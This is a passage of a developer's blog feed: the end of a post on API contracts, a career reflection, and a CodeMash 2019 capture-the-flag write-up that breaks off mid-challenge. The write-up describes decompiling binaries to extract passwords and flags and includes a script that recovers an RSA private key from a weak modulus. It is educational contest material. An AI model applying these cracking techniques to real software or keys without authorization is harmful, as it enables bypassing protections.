questions for us.</p><p>Ok great, lets assume the documentation is up to date and accurate. We find out that it is indeed JSON and is expecting a string. Apparently the PongService just returns the string that was sent as its response.</p><p>So the next steps most likely involve creating some model to represent the result of calling the service, importing Newtonsoft.JSON so we can do some JSON serialization and deserialization, and then ultimately POST to the endpoint (or was it a GET request?). After all of that is implemented, we finally validate whether or not both our request and response was formatted correctly.</p><p>Now that seems like a lot of work, manual work, to make a web request. The problem gets worse when you also consider that this process would need to be done for each and every service that wanted to interact with the PongService. That's a lot of code duplication that's scattered throughout the entire ecosystem that each team would need to manage.</p><figure class="kg-image-card"><img src="https://cloudcity.plex.com/servlet/JiveServlet/downloadImage/38-5582-194264/wheresoda.gif" class="kg-image" alt="There HAS to be a better way!"></figure><div align="center">"There has to be a better way"</div><h2 id="and-there-is-with-contracts-">And there is.. with Contracts!</h2><p>Contracts and the tooling that support them go a long way in solving the aforementioned problems. Lets take the same scenario as described above, but walk through it leveraging contracts. </p><p>The first thing we need to do is define the contract itself. This can be in any format: JSON, YAML, or in this case, <a href="https://cloudcity.plex.com/external-link.jspa?url=https%3A%2F%2Fdevelopers.google.com%2Fprotocol-buffers%2F" rel="nofollow">Protocol Buffers</a>. Generally the format that you decide on will be in the format expected by the tooling and technologies you intend to leverage. The key take away here is that you define upfront how messages should be structured and the types of each.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/05/protodef.png" class="kg-image"></figure><p>This is a <strong><strong>.proto</strong></strong> file that explicitly defines how to interact with the PongService. <strong><strong>The .proto file is the contract.</strong></strong></p><p>Messages are sent to the service using a <em><em>PongRequest</em></em> which has a message field, and then messages are received using a <em><em>PongResponse</em></em> which also has a message field. There is one endpoint that the service exposes, <em><em>Get</em></em>.</p><p>Ok, so you might be thinking.. "Cool? Looks a lot like API documentation to me. I'll go start writing some code that structures messages this way."</p><figure class="kg-image-card"><img src="https://cloudcity.plex.com/servlet/JiveServlet/downloadImage/38-5582-194267/pastedImage_28.png" class="kg-image"></figure><p>The beauty of leveraging contracts is that because there is an agreed upon way to interact with the service, it's really easy to automatically generate all of the concerns we spoke about in the previous example.</p><p>From the contract, we can automatically generate the PongRequest and PongResponse objects, there is no need for a developer to ever create them. We can automatically generate a Client so that you can connect to the service easily. We can automatically generate fakes, stubs, and mocks for testing. Everything you need to interact with the service can be yours at the press of a few buttons.</p><p>This moves the validation and enforcement of the contract to the left, way earlier in the development lifecycle. Remember in the previous example, we didn't really know if things were going to work out until the very end. The code generated from the contract gives us compile time confidence that the data is going to be sent and received a specific way.</p><p>We can even take this a step further, and from the same .proto file (contract), generate API documentation</p><figure class="kg-image-card"><img src="https://cloudcity.plex.com/servlet/JiveServlet/downloadImage/38-5582-194265/pongdoc.png" class="kg-image"></figure><p>The beauty of all of this is that if you were to change the contract, all of the resources that were generated above would be automatically regenerated during the CI/CD process. No more going into source code and updating client models or firing up some markdown editor to update your API documentation.</p><p>Contracts also makes it a lot easier to manage versioning and assess the ramifications of changing the contract when things do inevitably need to change. We can be notified on our local machines if a change that we are introducing breaks the currently defined contract. There's no need to ask ourselves "Is this a breaking change?". We can let the contract validation handle that for us.</p><figure class="kg-image-card"><img src="https://cloudcity.plex.com/servlet/JiveServlet/downloadImage/38-5582-194268/versioningexample.png" class="kg-image"></figure><h2 id="summary-and-takeaways">Summary and Takeaways</h2><p>This is an incredibly large topic as it can be applied to almost anything. This post really just scratches the surface. Hopefully, however, it was enough to introduce the idea of contracts and the benefits they can bring when you have a single, unwavering, source of truth that your ecosystem abides by.</p><p>Contracts enable the use of code generation with confidence. Why is that important?</p><ul><li>Code generation is your friend. There's no need to write your own client libraries in order to interact with a service.</li><li>Code generation is your friend. There's no need to write your own API documentation.</li><li>Code generation is your friend. There's no need to write your own testing stubs.</li></ul>]]></content:encoded></item><item><title><![CDATA[A Welcomed Change]]></title><description><![CDATA[<p>I've been a software developer for as long as I can remember. I still remember tinkering away on <a href="https://en.wikipedia.org/wiki/Netscape_Composer">Netscape Composer</a> building websites in the 2nd grade, which I suppose puts me around 7 years old at that time. It was fascinating! Every little puzzle you solved, every connection you made</p>]]></description><link>https://reese.dev/a-welcomed-change/</link><guid isPermaLink="false">5cdebedc18b2660ace8d0dc5</guid><category><![CDATA[work]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Fri, 26 Apr 2019 14:01:00 GMT</pubDate><content:encoded><![CDATA[<p>I've been a software developer for as long as I can remember. I still remember tinkering away on <a href="https://en.wikipedia.org/wiki/Netscape_Composer">Netscape Composer</a> building websites in the 2nd grade, which I suppose puts me around 7 years old at that time. It was fascinating! Every little puzzle you solved, every connection you made between the HTML tag and how it was represented on the screen, just made for an immersive and rewarding experience. I'll never forget how long it took me to fully grasp how linking to another static page worked. Days my friends, days.</p><p>This fascination only increased over time. After building websites and learning HTML, I moved onto PHP which opened up a whole other realm of possibilities for what I could put onto the Internet. I sold my first website in the 5th grade. It was just a little website for a band where it listed some information, mostly dates and some background information, but also the ability to send an email to the group with a form.</p><p>I can't say for sure when I <em>knew </em>software development was going to be my career, but it could have been at that moment. It has just felt like I've always known. I've considered myself lucky in that regard. Always knowing what I was going to do in life.</p><p>Not surprising, but I moved on to major in Computer Science, obtaining my Bachelor's at Michigan Technological University. One short month later, I began my career as a professional software developer.</p><p>I cannot adequately explain the excitement I had in the early days of my career. Up until then, my exposure to software development was just my own tinkerings and whatever my professors decided to assign me. I had no notion of what "production" meant, multiple web servers, databases, or deployment pipelines. I just used phpMyAdmin to create some databases and dropped my changes into my FTP client.</p><p>I think on my second day I was running into an issue where I couldn't find the source of the data that was displayed on a webpage. I was looking right at the database though. The name of the database was right, the table schema was right, but the rows just weren't there. Hours later I come to find out that there's this thing where you have multiple, identical databases, that are hosted in different locations to address scalability concerns.</p><p>WHOA! Oh, OK, so I just need to change this connection string thing so I can connect to the database where the data I'm trying to see <em>actually</em> exists.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/05/mindblown.gif" class="kg-image"></figure><div align="center">"Mind... blown"</div><p>This was life as a developer for quite some time. Everyday a new problem. Everyday learning about a new solution.</p><p>As time went on however, it got less exciting. There just became a time where I wanted to keep learning, progressing as a developer, but the work itself stayed the same. Company politics and arbitrary deadlines lead to a road of bubble gum and duct tape. </p><p>For a long time, a really long time, I didn't feel like I was really making anything. I was just patching the system to keep it running, alone. Collaboration wasn't something that was necessarily seen as a strong need. You are given this task, and you should be able to complete it on your own. Communication just takes up time you could be programming.</p><p>Everything was expected to just work, without much regard to the part about coding I cared the most about, the craftsmanship. We were a feature factory.</p><p>Even though I was utterly disenchanted for quite some time, I stuck with it. My friends were here, the people were amazing, and the benefits weren't to be taken for granted. It was a strong culture.</p><p>To fill in the gaps left by work I started blogging. I started going to every conference I could reasonably attend, and even spoke at some. I went on to get a Master's degree. Anything and everything I could think of to keep my passion in software alive. I figured this is how it had to be, unless I wanted to seek greener pastures elsewhere.</p><p>Luckily for me, an opportunity eventually came about. I was invited to join a team whose mission was to re-imagine how we develop at the company. We were to focus on all of the problems that plagued us as a company, and find solutions to them. But not just patch the existing system, and maybe make life slightly better, no. Throw out all restrictions, all previous decisions, and build something from nothing, the right way.</p><p>Reimagine how we set up our local environments, no more multiple day setups.</p><p>Reimagine how we develop our software, no more READMEs, use tooling.</p><p>Reimagine how we test our software, no more deploy to production and pray.</p><p>Reimagine the infrastructure our software runs on, no more distributed monolith.</p><p>I see it as a project born out of empathy. Most everyone at the company is painfully aware of the problems we face, but lack the time and power to fix anything in a meaningful way. We know what the problems are, we know the situation everyone is in, and it's a painful place to be in. Our true north is bettering the developer experience, and by proxy, bettering the company. If our actions do not reflect that, we've fallen down somewhere.</p><p>We've been working on this project for a little bit now, and I can't put into words how reinvigorating it is. Actions have meaning, collaboration is a first class citizen, and all of my teammates share my passion for development and doing it the right way. </p><p>It is indeed a welcomed change, and I am ecstatic about the future.</p><p></p>]]></content:encoded></item><item><title><![CDATA[CodeMash CTF 2019]]></title><description><![CDATA[<p>This past year <a href="http://www.codemash.org/">CodeMash</a> held their annual Capture the Flag competition. With the event wrapping up, I thought it would be a great learning opportunity for everyone to describe each of the challenges and explain the steps I took in order to solve each one. </p><p>There are <strong>fifteen </strong>in total</p>]]></description><link>https://reese.dev/codemash2019-ctf-solutions/</link><guid isPermaLink="false">5c2794cd04e4b332a4385dda</guid><category><![CDATA[ctf]]></category><category><![CDATA[conference]]></category><category><![CDATA[tutorial]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Sat, 12 Jan 2019 19:26:18 GMT</pubDate><content:encoded><![CDATA[<p>This past year <a href="http://www.codemash.org/">CodeMash</a> held their annual Capture the Flag competition. With the event wrapping up, I thought it would be a great learning opportunity for everyone to describe each of the challenges and explain the steps I took in order to solve each one. </p><p>There are <strong>fifteen </strong>in total so without further ado, lets begin!</p><ol>
<li><a href="#ascii-art">ASCII Art</a></li>
<li><a href="#busted-file">Busted File</a></li>
<li><a href="#esoteric-stuff">Esoteric Stuff</a></li>
<li><a href="#espresso">Espresso</a></li>
<li><a href="#krafty-kat">Krafty Kat</a></li>
<li><a href="#dot-nutcracker">Dot Nutcracker</a></li>
<li><a href="#capture-the-falg">Capture the Falg</a></li>
<li><a href="#ghost-text">Ghost Text</a></li>
<li><a href="#the-parrot">The Parrot</a></li>
<li><a href="#stacked-up">Stacked Up</a></li>
<li><a href="#unicorn">Unicorn</a></li>
<li><a href="#danger-zone">Danger Zone</a></li>
<li><a href="#mrs-robot">Mrs Robot</a></li>
<li><a href="#cars">Cars</a></li>
<li><a href="#on-site-challenge">On Site Challenge</a></li>
</ol>
<h2 id="ascii-art">ASCII Art</h2><p>The first challenge that was unlocked was some ASCII art that spelled out "CODE MASH". It also included this sentence: <strong>I love ASCII art. What about you?</strong></p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/02/code_mash_ascii.png" class="kg-image"></figure><p>Though if you notice, the word CODE has some numbers scattered throughout. </p><p>The problem seems to be hinting pretty hard that this problem is relating to ASCII and ASCII codes. So I tried taking each number in the word CODE, assumed it was an ASCII number, and tried to translate it to a character.</p><pre><code>cm19-asci-CODE-a1nt-H4RD
</code></pre>
<p>Well, that looks like a flag to me!</p><h2 id="busted-file">Busted File</h2><p>We are given a zip file (busted.zip) that contains a single image (image.png). Though when I tried to extract the image, I got an error saying that the archive is corrupt.</p><p>Upon trying to repair the archive using WinRAR, I was given an error about a <strong>Corrupt header</strong>.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/12/challenge2_photo3.png" class="kg-image"></figure><p>I had no idea what a zip header should look like, so I created my own zip file and opened it up into a hex editor.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/12/challenge2_photo2.png" class="kg-image"></figure><p>You can see here that the newly created (and valid) header contains: </p><pre><code>50 4B 03 04 14 00 02 00 08
</code></pre>
<p>Opening the corrupt file, you'll notice that the header contains: </p><pre><code>DE AD BE EF 14 00 00 00 08
</code></pre>
<figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/12/challenge2_photo1.png" class="kg-image"></figure><p>Using the hex editor to replace the corrupted header with the expected header allowed me to successfully unzip the file.</p><p>The contents of the zip file contained the following image:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/12/image.jpg" class="kg-image"></figure><p>This approach of hiding text within an image is called <em>steganography. </em>There are a couple ways that this could have been done.</p><ol><li>The flag could be rendered into the image itself. Typical methods of extraction could be to invert the colors, adjust the hue and saturation, etc. Play with the layers and colors to see if the original author put the text into the image itself.</li><li>Another approach, and the actual solution to this challenge, is to embed the text into the actual file. If you open up this image with Notepad or a hex editor, towards the beginning of the file you'll see the flag in plain text.</li></ol><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/12/image-1.png" class="kg-image"></figure><h2 id="esoteric-stuff">Esoteric Stuff</h2><p>The third challenge contained a large block of periods, exclamation points, and question marks.</p><pre><code>....................!?.?...?....
...?...............?............
........?.?.?.?.!!?!.?.?.?.?!!!.
....................!.?.?.......
................................
!.................!.!!!!!!!!!!!!
!!!!!!!!!!!!!..?.?!!!!!!!!!!!!!!
!!!.............................
!.?.?.......!..?.?!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!.?.?.!!!!!!!.
.?.?........................!.!!
!!!!!!!!!!!!!!!!!!!!!...!.?.....
..!.?.!..?.?....................
........!.!!!!!!!!!!!!!!!!!!!!!!
!!!!!...........................
....!.?...........!.?.!..?.?!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!.?.?.......!..?.?..!...!.?.?.!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.</code></pre><p>It also included this sentence: It's getting a bit esoteric now. <strong>Ook</strong>ay?!</p><p>Note the bolded text.</p><p>If you're unfamiliar with the term <em>esoteric </em>it means that something is only understood by a small set of individuals. In the world of programming, it refers to <a href="https://en.wikipedia.org/wiki/Esoteric_programming_language">esoteric programming languages</a>. These languages are typically just meant for fun and really aren't intended for production use. My goto example of an esoteric language is <a href="https://lolcode.org/">LOLCODE</a>.</p><p>I also noticed that the <em>Ook </em>in <em>Ookay </em>was bolded. I made the conclusion that <a href="https://esolangs.org/wiki/ook!">Ook </a>must be another esoteric programming language and the given text is source code written in Ook.</p><p>I attempted to use an <a href="https://www.dcode.fr/ook-language">Ook compiler</a> to retrieve the flag, and.. success!</p><h2 id="espresso">Espresso</h2><p>This challenge only provided a single file, <code>Espresso.class</code></p><p>Luckily, class files are something that you can decompile pretty easily, so the first step I took was to take the class file and put it through a <a href="http://www.javadecompilers.com/">Java decompiler</a> which resulted in the following source:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/12/challenge4_photo2.png" class="kg-image"></figure><p>Looking at the source of the class file, I saw that there is a conditional that checks to see if the user's input was equal to <code>localStringBuffer</code><em>. </em>If it matches, the program will print out: <strong>Flag correct, well done!</strong></p><p>That seems like a pretty good starting point, right?</p><p><code>locationStringBuffer</code> is a private variable that is defined and then built up in a for loop. After the for loop completes, the variable doesn't change and should theoretically contain the flag.</p><p>To get what <code>localStringBuffer</code> would be after running the for loop, I just went ahead and removed all of the extra code and just focused on getting <code>localStringBuffer</code> to be built.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/12/challenge4_photo1.png" class="kg-image"></figure><p>Running this slimmed down version of Espresso.class yields the flag.</p><h2 id="krafty-kat">Krafty Kat</h2><p>RSA encryption.. my dear old friend. This was the first challenge with a difficulty of "hard", and honestly took a decent bit longer than the other ones to crack.</p><p>This challenge has a <code>flag.enc</code> file and a <code>key.pem</code> file. The flag is obviously in the <code>flag.enc</code> file, and is encrypted. I knew I needed to use the provided public key in order to gain access to the encrypted file. The public key looked like this:</p><pre><code>-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEIAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEcwIDAQAB
-----END PUBLIC KEY-----
</code></pre>
<p>Now, how RSA encryption works could be a post all in itself, so I'll just go over each step and describe whats happening.</p><p>The above public key is a base64 encoded string that contains what is called the <em>Modulus </em>in RSA. We can use <em>openssl </em>to extract this result like so:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-2.png" class="kg-image"></figure><p>Here we can see the <strong>Modulus </strong>and the <strong>Exponent </strong>(65537). Now, the Modulus is currently in hex, but I need to get this number as an integer. </p><p>The first step to do this is to strip away all of the colons</p><pre><code>800000000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000473
</code></pre>
<p>The next step is to convert this into an integer. I used python to cast it, but the method doesn't really matter.</p><pre><code>258536048570605626988915097172641057803353415992887757589736645808726151727194085610744190012322229640908553929414833022731988789391928353742297595957524280335918484224592037842886381777837922164216258913020883767452162759055614423529478656392491416399318604362756647059576165428708885769576577464120568116338612287783043168328279883802253392551292712278925133675758884573430117126518137049529478694956180472120065649305066144792948879520988172974401270565515875720597321219813209954571652637983550511681618170361995093036165713586725018263017699754932627926751512891645482818654590419836934782173099306176053375927411
</code></pre>
<p>When working with RSA, a really important formula is <code>n = p * q</code>, and the number above (the really big one), is my <code>n</code> value. <code>n</code> is derived from the product of <code>p</code> and <code>q</code> (both of which are prime numbers) resulting in the equation <code>n = p * q</code>. If you know <code>p</code> and <code>q</code>, you can derive the private key.</p><p>However, these prime numbers are kept secret and should not be known. It is possible to figure out what they are though if the RSA was implemented poorly (e.g. bad primes were chosen).</p><p>So if <code>n</code> is the product of <code>p</code> and <code>q</code>, and both <code>p</code> and <code>q</code> must be prime. How do we figure out what they could possibly be? Brute force is one option, but would take.. a long time. Too much time.</p><p>The alternative is to see if any factors of <code>n</code> already exist. I did this through a website called <a href="http://factordb.com">factordb</a>. I plugged in the <code>n</code> value I calculated above and noticed that there are no factors.l</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-3.png" class="kg-image"></figure><p>Well.. if <code>n = p * q</code> and <code>p</code> and <code>q</code> must be prime.. but <code>n</code> has no factors.. p must be equal to <code>n</code> and then <code>q</code> must be equal to <code>1</code>.</p><p>At this point we know <code>p</code>, <code>q</code>, <code>e</code>, and <code>n</code>. The last value we need is <code>d</code> or the decryption key. Honestly at this point, <code>d</code> can just be calculated from all of our other values so I just wrote a script in Python to do just that.  </p><pre><code class="language-python">from Crypto.Util.number import inverse
from Crypto.PublicKey import RSA
import gmpy2

#open the provided key file
pub = open(&quot;key.pem&quot;, &quot;r&quot;).read()
pub = RSA.importKey(pub)

#set the values of n and e from the key file
n = int(pub.n)
e = int(pub.e)

#set p and q from factordb
p = 258536048570605626988915097172641057803353415992887757589736645808726151727194085610744190012322229640908553929414833022731988789391928353742297595957524280335918484224592037842886381777837922164216258913020883767452162759055614423529478656392491416399318604362756647059576165428708885769576577464120568116338612287783043168328279883802253392551292712278925133675758884573430117126518137049529478694956180472120065649305066144792948879520988172974401270565515875720597321219813209954571652637983550511681618170361995093036165713586725018263017699754932627926751512891645482818654590419836934782173099306176053375927411
q = 1

#calculate d
d = int(gmpy2.invert(e,n-1))

#use d to create a private key and read the message
key = RSA.construct((n,e,d))
message = key.decrypt(open('flag.enc').read(), '')

print(message)
</code></pre>
<p>This will print the contents of the <code>flag.enc</code>, which contains the flag itself!</p><h2 id="dot-nutcracker">Dot Nutcracker</h2><p>In this challenge, there was an executable file that gave you three attempts in order to type in a password. If you got the password correct, the program would output what the flag was. </p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-1.png" class="kg-image"></figure><p>Now obviously, the three attempts were just fluff, as you could just start the program again. Regardless, the password (and the flag) have to be inside of the executable somewhere.</p><p>To get at the source code of the application, I used decompiler called <a href="https://www.jetbrains.com/decompiler/">dotPeek</a> which allowed me to view the source of the executable. I even took it a step further and exported the source to a new project. This allowed me to make modifications to the program itself, as well as do any sort of debugging.</p><p>Reading through the source code, I came across the primary <code>if</code> check that compared the users input with the stored password.</p><pre><code class="language-csharp">      while (num &gt; 0)
      {
        Console.WriteLine(string.Format(&quot;You have {0}/3 attempt(s) left.&quot;, (object) num));
        Console.Write(&quot;Enter passphrase: &quot;);
        string str1 = Console.ReadLine();
        string str2 = CryptoHelper.DecryptStringAES(&quot;EAAAAH5ZA4kASLVjLUsYmLK3h74KWmkS4BvBS61BuaD4lnyqdz3AO8/xfGO1atVdci0x1g==&quot;);
        if (str1 != null &amp;&amp; cryptoHelper.Equals(str2, str1))
        {
          Console.WriteLine(string.Format(&quot;Decrypted Flag is: {0}&quot;, (object) CryptoHelper.DecryptStringAES(&quot;EAAAAOlDKPcRaUj/ITV1q9IHN1bAQyUWxZqVob+G1gpmyoIJIPej1O3T4TWnRUndqp4NnA==&quot;, CryptoHelper.GetHashString(str2), str1, str1)));
          Console.WriteLine(&quot;Press enter to quit&quot;);
          Console.ReadLine();
          Environment.Exit(1337);
        }
        --num;
        Console.WriteLine(&quot;That's wrong.&quot;);
      }
</code></pre>
<p>Reading the code above, it looks like <code>str2</code> contains the password. I did a <code>Console.Writeline</code> of <code>str2</code> and saw that <em>acrackeradaykeepsthedoctoraway </em>is printed out. Success! Found the password.</p><p>However, when attempting to use the password, the program crashes with the following message:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image.png" class="kg-image"></figure><p>I went through the source code some more and noticed that the original <code>if</code> statement that compares the passwords is actually using <code>CryptoHelper</code>'s <code>Equals</code> method and it has the following implementation:</p><pre><code class="language-csharp">public bool Equals(string a, string b)
{
  if (!b.Equals(a))
    return a.Equals(b + &quot;y&quot;);
  return true;
}
</code></pre>
<p>This means that both <code>acrackeradaykeepsthedoctoraway</code> and <code>acrackeradaykeepsthedoctorawa</code> should both be correct passwords. Well, if the former causes the application to crash, maybe the second one wont.</p><p>It did not!</p><h2 id="capture-the-falg">Capture the Falg</h2><p>This challenge had the following text:</p><pre><code>This falg is easy to catch, isn't it?
criSdmetio1AUdW9dP3n----
</code></pre>
<p>and gave this picture:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/capturethefalg.jpg" class="kg-image"></figure><p>If you notice, the name of the challenge is Capture the Falg and not Flag. The <code>a</code> and <code>l</code> are jumbled up. The image is also jumbled up. Another interesting notice is that the word falg has 4 letters, and theres also 4 boxes for each piece of the flag.</p><p>To render the image correctly, you'd want the 1st image to stay where it's at. Followed by the image directly below it, followed by the top right image, and lastly keep the last image where it's at.</p><p>Applying this same approach the word <code>falg</code>, you would get the following:</p><pre><code>fa
lg
</code></pre>
<p>To read the word <code>flag</code> you need to start from the top left, move down, and then go back to the top in the next column.</p><p>Now, if we were to apply this same pattern to the string that we were given (presumably the flag itself), we get the following:</p><pre><code>criSd
metio
lAUdW
9dP3n
----
</code></pre>
<p>Reading the text just like before will render the flag.</p><h2 id="ghost-text">Ghost Text</h2><p>For this challenge the description was:</p><pre><code>Ghost text is ... invisible!
</code></pre>
<p>The challenge also provided a text file with this text:</p><pre><code>​In​ ​folk​l​or​e​, ​a​ g​hos​t​ is ​the​ ​s​oul​ or​ s​p​ir​it​ ​o​f a​ dea​d​ pe​r​son​ ​or​ ani​m​al ​that ​ca​n​ a​pp​e​ar t​o t​h​e​ l​ivin​g​.​ I​n​ ​gh​o​st​l​o​re, ​gh​o​st​ d​e​s​cr​ipti​o​ns​ vary​ ​wid​el​y,​ from​ ​inv​is​i​bl​e ​pre​sence​s to l​if​el​ike​ vi​si​ons​.
</code></pre>
<p>Now, given the challenge description, I assumed there was something hidden inside of the text file that was given. So I opened it with my trusty HexEditor.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-4.png" class="kg-image"></figure><p>You'll notice that there's a lot of jumbled characters intertwined between the text itself, characters we could not see before. These characters are known as <em>zero width characters</em> and are a common approach to hiding messages in text.</p><p>To more easily digest how this message really looks, we can use a unicode analyzer. I've provided the link below.</p><p><a href="https://www.fontspace.com/unicode/analyzer/?q=%E2%80%8BIn%E2%80%8B+%E2%80%8Bfolk%E2%80%8Bl%E2%80%8Bor%E2%80%8Be%E2%80%8B%2C+%E2%80%8Ba%E2%80%8B+g%E2%80%8Bhos%E2%80%8Bt%E2%80%8B+is+%E2%80%8Bthe%E2%80%8B+%E2%80%8Bs%E2%80%8Boul%E2%80%8B+or%E2%80%8B+s%E2%80%8Bp%E2%80%8Bir%E2%80%8Bit%E2%80%8B+%E2%80%8Bo%E2%80%8Bf+a%E2%80%8B+dea%E2%80%8Bd%E2%80%8B+pe%E2%80%8Br%E2%80%8Bson%E2%80%8B+%E2%80%8Bor%E2%80%8B+ani%E2%80%8Bm%E2%80%8Bal+%E2%80%8Bthat+%E2%80%8Bca%E2%80%8Bn%E2%80%8B+a%E2%80%8Bpp%E2%80%8Be%E2%80%8Bar+t%E2%80%8Bo+t%E2%80%8Bh%E2%80%8Be%E2%80%8B+l%E2%80%8Bivin%E2%80%8Bg%E2%80%8B.%E2%80%8B+I%E2%80%8Bn%E2%80%8B+%E2%80%8Bgh%E2%80%8Bo%E2%80%8Bst%E2%80%8Bl%E2%80%8Bo%E2%80%8Bre%2C+%E2%80%8Bgh%E2%80%8Bo%E2%80%8Bst%E2%80%8B+d%E2%80%8Be%E2%80%8Bs%E2%80%8Bcr%E2%80%8Bipti%E2%80%8Bo%E2%80%8Bns%E2%80%8B+vary%E2%80%8B+%E2%80%8Bwid%E2%80%8Bel%E2%80%8By%2C%E2%80%8B+from%E2%80%8B+%E2%80%8Binv%E2%80%8Bis%E2%80%8Bi%E2%80%8Bbl%E2%80%8Be+%E2%80%8Bpre%E2%80%8Bsence%E2%80%8Bs+to+l%E2%80%8Bif%E2%80%8Bel%E2%80%8Bike%E2%80%8B+vi%E2%80%8Bsi%E2%80%8Bons%E2%80%8B.%E2%80%8B">https://www.fontspace.com/unicode/analyzer/?q=%E2%80%8BIn%E2%80%8B+%E2%80%8Bfolk%E2%80%8Bl%E2%80%8Bor%E2%80%8Be%E2%80%8B%2C+%E2%80%8Ba%E2%80%8B+g%E2%80%8Bhos%E2%80%8Bt%E2%80%8B+is+%E2%80%8Bthe%E2%80%8B+%E2%80%8Bs%E2%80%8Boul%E2%80%8B+or%E2%80%8B+s%E2%80%8Bp%E2%80%8Bir%E2%80%8Bit%E2%80%8B+%E2%80%8Bo%E2%80%8Bf+a%E2%80%8B+dea%E2%80%8Bd%E2%80%8B+pe%E2%80%8Br%E2%80%8Bson%E2%80%8B+%E2%80%8Bor%E2%80%8B+ani%E2%80%8Bm%E2%80%8Bal+%E2%80%8Bthat+%E2%80%8Bca%E2%80%8Bn%E2%80%8B+a%E2%80%8Bpp%E2%80%8Be%E2%80%8Bar+t%E2%80%8Bo+t%E2%80%8Bh%E2%80%8Be%E2%80%8B+l%E2%80%8Bivin%E2%80%8Bg%E2%80%8B.%E2%80%8B+I%E2%80%8Bn%E2%80%8B+%E2%80%8Bgh%E2%80%8Bo%E2%80%8Bst%E2%80%8Bl%E2%80%8Bo%E2%80%8Bre%2C+%E2%80%8Bgh%E2%80%8Bo%E2%80%8Bst%E2%80%8B+d%E2%80%8Be%E2%80%8Bs%E2%80%8Bcr%E2%80%8Bipti%E2%80%8Bo%E2%80%8Bns%E2%80%8B+vary%E2%80%8B+%E2%80%8Bwid%E2%80%8Bel%E2%80%8By%2C%E2%80%8B+from%E2%80%8B+%E2%80%8Binv%E2%80%8Bis%E2%80%8Bi%E2%80%8Bbl%E2%80%8Be+%E2%80%8Bpre%E2%80%8Bsence%E2%80%8Bs+to+l%E2%80%8Bif%E2%80%8Bel%E2%80%8Bike%E2%80%8B+vi%E2%80%8Bsi%E2%80%8Bons%E2%80%8B.%E2%80%8B</a></p><p>Using this website, we can see every single character that is contained within the string. You'll notice that there are "ZERO WIDTH SPACE" characters throughout the text. This is important!</p><p>This approach to hiding messages in text generally involves the use of binary. Every approach to encryption is going to be different, but most messages end up as some sort of binary representation. Maybe each zero width character is a 1 and each real space is a 0. These 1's and 0's will form a binary string, which can then be translated into readable text.</p><p>It's also very common for CTF events to use the same flag structure. In this one, all of the flags (so far) have started with cm19.</p><p>With this in mind, I wanted to see if I could extract cm19 in binary from the zero width spaces.</p><p><strong>cm19 </strong>in binary is: <strong>01100011 01101101 00110001 00111001</strong></p><p>If you reference the unicode analyzer page linked previously, you may see a pattern here. </p><p>The word "in" is followed by a zero width space.</p><p>The single space afterwards is followed by a zero width space.</p><p>The word "folklore" has a zero width space after "folk"</p><p>If we assume that the zero width spaces are some sort of terminator, it actually starts to fit our assumption of the cm19 binary string.</p><p>In would be 01</p><p>A single space would be 1</p><p>Folk would be 0001</p><p>.. and so on. If we combine the above we get 0110001 which is the start of our cm19 binary string!</p><p>Now I had no desire to go through this entire sentence by hand and finish out the sequence, so I wrote a quick GOLANG program to do it for me.</p><pre><code class="language-go">package main

import &quot;strings&quot;

func main() {
	input := &quot;​In​ ​folk​l​or​e​, ​a​ g​hos​t​ is ​the​ ​s​oul​ or​ s​p​ir​it​ ​o​f a​ dea​d​ pe​r​son​ ​or​ ani​m​al ​that ​ca​n​ a​pp​e​ar t​o t​h​e​ l​ivin​g​.​ I​n​ ​gh​o​st​l​o​re, ​gh​o​st​ d​e​s​cr​ipti​o​ns​ vary​ ​wid​el​y,​ from​ ​inv​is​i​bl​e ​pre​sence​s to l​if​el​ike​ vi​si​ons​.​&quot;

	result := &quot;&quot;

	for _, v := range input {

		if v == 8203 {
			result = strings.TrimSuffix(result, &quot;0&quot;)
			result += &quot;1&quot;

		} else {
			result += &quot;0&quot;
		}

	}

	print(result)
}
</code></pre>
<p>Running the application gives the following binary string:</p><pre><code>011000110110110100110001001110010010110101110010001100110011010001100100001011010110001001110100011101110110111000101101011101000110100001100101010000110010110101001000010000010101001001010011
</code></pre>
